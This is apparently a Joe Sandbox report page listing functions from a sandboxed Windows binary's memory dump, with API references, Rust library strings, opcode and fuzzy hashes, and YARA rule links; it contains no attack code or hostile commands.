Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 2bb6a0f50e999e1c32c590235385c4ac38d2232a802c877402333a7942c14c19
Instruction ID: 247524975f1b194019a08b9f84c56d35bf51e955245731351698b74688b7dfd4
Opcode Fuzzy Hash: 2bb6a0f50e999e1c32c590235385c4ac38d2232a802c877402333a7942c14c19
Instruction Fuzzy Hash: 91C1B262628F8641EA10AF15A4143AEE761FB89BF0F944277DE9E47799DE3CD24CC310

Function 00007FF71A7C121E Relevance: 2.8, APIs: 2, Instructions: 280COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7C12EE
memset.MSVCRT ref: 00007FF71A7C138C

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 2f265235a09861cf438544211ea1b53584e42f9234481753f146f929d953227c
Instruction ID: 14eace4af482ecbac00c89753569a7f7056e5ce920d71a963500c3386342e957
Opcode Fuzzy Hash: 2f265235a09861cf438544211ea1b53584e42f9234481753f146f929d953227c
Instruction Fuzzy Hash: 29B10822728F8682EA119F29A404169A761F789BF0F944736DFAE177D9DF3CD219C310

Function 00007FF71A84DBF9 Relevance: 2.8, APIs: 2, Instructions: 276COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A84DCD1
memset.MSVCRT ref: 00007FF71A84DD4E

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: e124defa1e9565e723c35b0fafe39565d5fba906b69deb7741d07128c4a52700
Instruction ID: e789939562ab090c7ee34250f10ba28ae2077fc662406ab1f4be8bcb1f38838e
Opcode Fuzzy Hash: e124defa1e9565e723c35b0fafe39565d5fba906b69deb7741d07128c4a52700
Instruction Fuzzy Hash: 9FB1D062A18FC586EB219F29A4042A9A760FB85BF0F844326DFAE177D5DF3CD159C310

Function 00007FF71A7D51C7 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

"""""""", xrefs: 00007FF71A7D51E9
DDDDDDDD, xrefs: 00007FF71A7D51F9

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: """"""""$DDDDDDDD
API String ID: 0-1621327129
Opcode ID: 203caf99a752f4382e5791600dcb6d3375b766391c2bdee42f8ce38e18708418
Instruction ID: 49ad9955b2dee507c848a44beefcc1689213908654d382d4c4e52eb95d331184
Opcode Fuzzy Hash: 203caf99a752f4382e5791600dcb6d3375b766391c2bdee42f8ce38e18708418
Instruction Fuzzy Hash: 17115E8332117509292D9EA33E279A3C84E3689FDC90CF9332D895BFA9D4BEE441A145

Function 00007FF71A8313E0 Relevance: 2.0, APIs: 1, Instructions: 757COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A83147D

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 6b3a801c5ee54cf47e2a6b7b987853eab08e399b2c5719fba28083fafddf9146
Instruction ID: 33ad5ae67626ba1e3ab6575d8d72a87156628199304c5f19904bb37707a3c225
Opcode Fuzzy Hash: 6b3a801c5ee54cf47e2a6b7b987853eab08e399b2c5719fba28083fafddf9146
Instruction Fuzzy Hash: C3827D32A08BC185FB729F21D8543F963A1FB64798F844176CA4D0BB98DF38D6A9C350

Function 00007FF71A7ABAD0 Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

.llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs, xrefs: 00007FF71A7ABAD3

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs
API String ID: 0-1822433098
Opcode ID: 6bcd2bf87f7ad2563f6df355cc29d4d5e7b1fe733c7ddf1003407ef2c3665811
Instruction ID: 6e39fc0bf5fcb208432ba50e0504d4686790069c0820799d5558e4364f947c72
Opcode Fuzzy Hash: 6bcd2bf87f7ad2563f6df355cc29d4d5e7b1fe733c7ddf1003407ef2c3665811
Instruction Fuzzy Hash: F3C18997F24FA511F71356381402AB496006FA77F4B44D723FEA872BD5DB24AB478214

Function 00007FF71A7A1E71 Relevance: .7, Instructions: 712COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037f148c6d15ffb0b634446767492350d6b524a85cc5d2fefd89856900ccc2f3
Instruction ID: 2fe6baff5daf59c08ebc74eb4cc8c025a776b780260fe4cbf96a0ef415763348
Opcode Fuzzy Hash: 037f148c6d15ffb0b634446767492350d6b524a85cc5d2fefd89856900ccc2f3
Instruction Fuzzy Hash: 64525962A0C9E252F3255E15A420379EB61D745B90F8841B7EE8E13BA5CE3CDB1ED360

Function 00007FF71A837990 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaea989f8b9e08d10f78b9309ac379f1e6d1794bf263be808c8fac5802ce45f9
Instruction ID: a464501e0f1b2a46212b2b03684823652229228cffb87bf45455c215aca70459
Opcode Fuzzy Hash: aaea989f8b9e08d10f78b9309ac379f1e6d1794bf263be808c8fac5802ce45f9
Instruction Fuzzy Hash: 36727972A04FC589E7729F25D8407E977A4FB18BA8F504166DE8D0BB98CF38D6A5C310

Function 00007FF71A7A7E09 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3563b48e092c9c6e434cb796947e3cb8bb22bb493eb5ed73c97f617857ff081
Instruction ID: a53c15ef1cde1751d591b2ad5903abb0153f7026e1aae1166cb8686c4904c7be
Opcode Fuzzy Hash: b3563b48e092c9c6e434cb796947e3cb8bb22bb493eb5ed73c97f617857ff081
Instruction Fuzzy Hash: CF220BA3719B9441FA50DFA2BC61AA7E751FB99BC0F44A036EE4D97B09CE3CC6459300

Function 00007FF71A8339B0 Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c86eac3f9a3cd28297eda1cd1bf98a298b6d3cf37cb647b1a03d5b12f5bc89f
Instruction ID: eccb3ac9d66357349772bbd43ed2baedaf0ed3f14896568f50c17f7d19f9004f
Opcode Fuzzy Hash: 2c86eac3f9a3cd28297eda1cd1bf98a298b6d3cf37cb647b1a03d5b12f5bc89f
Instruction Fuzzy Hash: 3042A736F14E518AF701EBA8E4443AD77B0FB0476CF60496ACE9A97B84CB78D199C350

Function 00007FF71A7A976D Relevance: .6, Instructions: 561COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c70cb6abe7f265b8d02d29c7ee14d5ce909a47b29db1b4c63c23eb8f28a51bc
Instruction ID: 6deacc2ca912cecd1834a42cee8465e3d353c9f53d5f5ef92c55eadec4ed4b1f
Opcode Fuzzy Hash: 9c70cb6abe7f265b8d02d29c7ee14d5ce909a47b29db1b4c63c23eb8f28a51bc
Instruction Fuzzy Hash: 573249A6A09AC6A2F315BB6584102FC9B11D749B90FC881B7DE0D177C3CE2C9A6DC370

Function 00007FF71A825BA0 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48b6b58603887ad83db58a4c54ac9b815ff6b8f8957b9c51009a0ebf42b7a3d6
Instruction ID: b153fb12359adadb7829f87201c42def9b3fd28ae44afc05dcca6c6223f624f9
Opcode Fuzzy Hash: 48b6b58603887ad83db58a4c54ac9b815ff6b8f8957b9c51009a0ebf42b7a3d6
Instruction Fuzzy Hash: 21C158A2D4CF9244F76BAA349400779EA815712771FD492B3CA7F132D0DA3C99BAD230

Function 00007FF71A7A7795 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb16b9e63eef4c7f108fe6e441474a9516a69e07e58e9ba48756cb484e06ccfe
Instruction ID: dbcb5577fa4b55dd3ab4cd2aa15bad7c013b790e0f86003dbf25d810496cb214
Opcode Fuzzy Hash: bb16b9e63eef4c7f108fe6e441474a9516a69e07e58e9ba48756cb484e06ccfe
Instruction Fuzzy Hash: C58127A3714B5486F610DFE1A920AD7E762F748BE8F58A032EE4C17B58CE3CD656C610

Function 00007FF71A82BBD0 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be145464b348672d7732895417242614515ae7056c9c6d2f34affdc0493ed8e4
Instruction ID: 00e7dc67b96d85914d8e6147033b893e631dc9a0fd866757a55968e0e4a5003a
Opcode Fuzzy Hash: be145464b348672d7732895417242614515ae7056c9c6d2f34affdc0493ed8e4
Instruction Fuzzy Hash: D4A13662B19B9181F7229B2489047BDBFA0FB00B98FA55133CF5D27780DB75D96AD320

Function 00007FF71A7B0080 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abed3323822b3f37b3983947922bcf10a2b5fb48d63914db73f310c5f8264566
Instruction ID: fbb480e94510aa93deaf87a7f2baa9cf44da5761dca4318a218d75be10a7f544
Opcode Fuzzy Hash: abed3323822b3f37b3983947922bcf10a2b5fb48d63914db73f310c5f8264566
Instruction Fuzzy Hash: 29513FA3B197E09EF3229B785400A6C7F619B25B58F4440D5CFD81BF86C616C22DE361

Function 00007FF71A841370 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9ffe87dac8b0f79c3486d9fe87084e90ea7465f2c9ef8dd3cb41c2da5f34cc
Instruction ID: edf12087d2ebade498f1cdb37fd1d833dc4015160b7064428b19ae91db9259dd
Opcode Fuzzy Hash: 7a9ffe87dac8b0f79c3486d9fe87084e90ea7465f2c9ef8dd3cb41c2da5f34cc
Instruction Fuzzy Hash: 5D417F72605BC48AEB71DF25A8953EA3794F7147A8F404325DE6D4BBD8DF388296C200

Function 00007FF71A7D52DF Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b21c6df9a490054b24c4642118afc5170f8b8e832fff8304ff958a96bcd3bf8
Instruction ID: d982e61f92c76d78ef257a68678bc50c918854fd814de7306fde76516542058e
Opcode Fuzzy Hash: 7b21c6df9a490054b24c4642118afc5170f8b8e832fff8304ff958a96bcd3bf8
Instruction Fuzzy Hash: A4219299C0AF9942E713733D60033A7E7106EF784CA41E70BFDE435E64D70265523214

Function 00007FF71A831B4F Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3cc16cd4057371b8316ae76c64e2ef911c356c9645c6bf3f30278fe0dd93fa1
Instruction ID: 402adba7618f95215929ca35de81b8a23bbb9ac1ebe741c2bc5bee2238a482b0
Opcode Fuzzy Hash: c3cc16cd4057371b8316ae76c64e2ef911c356c9645c6bf3f30278fe0dd93fa1
Instruction Fuzzy Hash: B6012D21F18A5141FB669921A950BFA5561FF217A8F8460B3DD0E17A84DE3499289310

Function 00007FF71A7A1D00 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0251260e76a74651e5868f7c8dc76e521ae6ae4722ccc1664a98ba960f82a64
Instruction ID: a3794662df550f07991de5908a4627441c8b5e6cfb2a291ad3662dd6efeb3f29
Opcode Fuzzy Hash: a0251260e76a74651e5868f7c8dc76e521ae6ae4722ccc1664a98ba960f82a64
Instruction Fuzzy Hash: 37E0ECCB60FBE455E3135A3D155405CAF14855AE9935D85E5D3A703363D40E100BD221

Function 00007FF71A7DB355 Relevance: 21.5, APIs: 17, Instructions: 299COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7DBCCB
memcpy.MSVCRT ref: 00007FF71A7DBCF7
memcpy.MSVCRT ref: 00007FF71A7DBE12
memcpy.MSVCRT ref: 00007FF71A7DBE84
memcpy.MSVCRT ref: 00007FF71A7DBE99
memcpy.MSVCRT ref: 00007FF71A7DBEFE
memcpy.MSVCRT ref: 00007FF71A7DBFCB
memcpy.MSVCRT ref: 00007FF71A7DBFE6

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 5a7722c4cc2d16d9f2781eaec9208819a5f0d3889639685444df4ce7b1efc849
Instruction ID: b9efa45d390367d7cf382ea71a4cb4bed12747ca7ff139218230b19134ff65f7
Opcode Fuzzy Hash: 5a7722c4cc2d16d9f2781eaec9208819a5f0d3889639685444df4ce7b1efc849
Instruction Fuzzy Hash: 9CF13E22608E8180FB61EF21E4543FEA764FB45B98F844076DE8D4B69ADF78D25DC720

Function 00007FF71A7FBB1C Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7FBB48
memcpy.MSVCRT ref: 00007FF71A7FBC1B
memcpy.MSVCRT ref: 00007FF71A7FBCB7
memcpy.MSVCRT ref: 00007FF71A7FBD10
memcpy.MSVCRT ref: 00007FF71A7FBD71
memcpy.MSVCRT ref: 00007FF71A7FBD9F
memcpy.MSVCRT ref: 00007FF71A7FBDCA

Part of subcall function 00007FF71A7F0256: SwitchToThread.KERNEL32(?,?,?,?,00007FF71A7F01D5), ref: 00007FF71A7F027C

Strings

Map must not be polled after it returned `Poll::Ready`, xrefs: 00007FF71A7FBE87
polling StreamFuture twice/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/stream/stream/into_future.rs, xrefs: 00007FF71A7FBE9F
internal error: entered unreachable codemid > len, xrefs: 00007FF71A7FBE4B

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy$SwitchThread
String ID: Map must not be polled after it returned `Poll::Ready`$internal error: entered unreachable codemid > len$polling StreamFuture twice/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/stream/stream/into_future.rs
API String ID: 3101437787-3501928663
Opcode ID: 33edb968f592a0e241f94e017698f6b584fe721b748f08ef977bac56680562b1
Instruction ID: 6d1983c548e2bde8376175c3d0c70688f56c0061d14f444e73491d7320460363
Opcode Fuzzy Hash: 33edb968f592a0e241f94e017698f6b584fe721b748f08ef977bac56680562b1
Instruction Fuzzy Hash: C1916026608E8385FA35EF24A4553FAE750EB89760F840072CBAE43685DE3CE74DC721

Function 00007FF71A8000B6 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A8001D9
memcpy.MSVCRT ref: 00007FF71A800372

Strings

received unexpected shutdown ping, xrefs: 00007FF71A80623D
assertion failed: stream.state.is_closed(), xrefs: 00007FF71A8061EF

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: stream.state.is_closed()$received unexpected shutdown ping
